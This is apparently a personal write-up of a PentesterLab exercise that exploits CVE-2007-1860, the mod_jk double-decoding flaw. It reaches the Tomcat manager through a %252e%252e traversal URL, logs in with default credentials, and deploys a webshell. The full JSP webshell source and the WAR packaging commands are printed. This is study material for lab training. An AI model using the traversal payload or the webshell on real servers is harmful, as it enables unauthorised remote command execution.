Pentesterlab--cve-2007-1860

By means of these seven considerations I can forecast victory or defeat. —– The Art of War

This course details the exploitation of a vulnerability in mod_jk and how by using this issue it is possible to access the administration interface of a Tomcat server (Tomcat’s manager). Then using this access, we will see how an attacker can use default credentials to log in as administrator and use this access to gain code execution on the server. —Pentesterlab

Difficluty: 2/5

Forces:

  • Nmap
  • NC
  • Firebug
  • webshell

Detail Assessment and Planning

  • Port scan to identify opened ports, running services and services version. —– Nmap
  • Check http headers. —– NC
  • Exploit and upload webshell. —- Firebug

Waging War

Weaknesses and Strengths

Used Nmap to idenfity opened ports. TCP port 80 is opened and Apache service is running on it.

By checking the application HTTP headers with nc, I can also get Apache service version.

1
2

GET / HTTP/1.1
Host: 192.168.79.168

Attack

First of all, we need to figure out the architecture of Tomcat and Apache. Read here

If we try to visit a non-exist page, we will receive 404 error like that:

Based on the result, we know the http request is processed by Apache.

If we try to visit page like 192.168.79.168/examples/jsp/test404, we will get the 404 error like:

Then we know that the http request is processed by Tomcat through Apache.

Tomcat Manager is available at the following URI: /manager/html and is, most of the time, protected by a password. The CVE-2007-1860 vulnerability is described advisory

From pentesterlab,

If you provide this %252e to a vulnerable modjk, it will perform a first decoding and send the value %2e to Tomcat. Tomcat will then perform a second decoding to get the value .. If you use %252e%252e, you will then be able to send .. to Tomcat. If you try to send .. directly to Apache, it will not forward the request to Tomcat unless the path resolve to a path configured to be forwarded to Tomcat (using modjk).

Now we know how to access the /manager/html, (Sometimes you may need to repeat several times %252e%252e/)

http://192.168.79.168/examples/jsp/%252e%252e/%252e%252e/manager/html

The credentials are one of the default ones. In this exerciese, the admin didn’t change the credentials. The user name is admin and password is empty. Once we get it, we are able to get acces to the Tomcat Manager.

Now we need to create a webshell and upload it to the Tomcat.

Deploy a webshell

webshell (from pentesterlab, you may generate it using msfvenom)

index.jsp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
   String cmd = request.getParameter("cmd");
   String output = "";
   if(cmd != null) {
      String s = null;
      try {
         Process p = Runtime.getRuntime().exec(cmd,null,null);
         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
         while((s = sI.readLine()) != null) { output += s+"</br>"; }
      }  catch(IOException e) {   e.printStackTrace();   }
   }
%>
<pre><%=output %></pre>

now we have to pack the webshell

index.jsp
1
2
3
4
5

$ mkdir webshell
$ cp index.jsp webshell

$ cd webshell
$ jar -cvf ../webshell.war *

webshell webshell.war is ready to fire.

Upload webshell

We can use the form to upload war file:

However, it will give you a 404 page since the deployment url does not use the double -encoding trick to gain access to get the manager. So we have to use firebug to give the form right location.

change the location to :

After successful uploading webshell, it will show in the Tomcat manager:

now enjoy the webshell by accessing

http://192.168.79.168/examples/%252e%252e/webshell/

DONE

cve-2007-1860, mod_jk double-decoding, pentesterlab